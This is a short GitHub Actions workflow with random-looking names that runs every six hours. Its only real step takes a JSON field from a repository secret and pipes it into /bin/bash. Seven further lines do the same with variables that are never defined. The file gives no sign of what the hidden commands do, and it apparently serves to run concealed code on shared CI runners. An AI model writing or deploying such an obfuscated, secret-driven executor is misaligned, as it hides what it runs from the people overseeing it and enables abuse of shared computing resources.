name: clowderajar
on:
  workflow_dispatch:
  schedule:
    - cron: '10 4/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: clowderajar
        env:
          xdlsu97: ${{ secrets.xdlsu97 }}
        run: |
          echo $xdlsu97 | jq -r .gv520 | /bin/bash
          echo $ucr14864 | jq -r .jh760 | /bin/bash
          echo $hzde3409 | jq -r .of431 | /bin/bash
          echo $leofm14093 | jq -r .gnvux59264 | /bin/bash
          echo $dlh9 | jq -r .zdhao8 | /bin/bash
          echo $ert79948 | jq -r .x69793 | /bin/bash
          echo $j4 | jq -r .lq1723 | /bin/bash
          echo $vjsia406 | jq -r .fhcp341 | /bin/bash

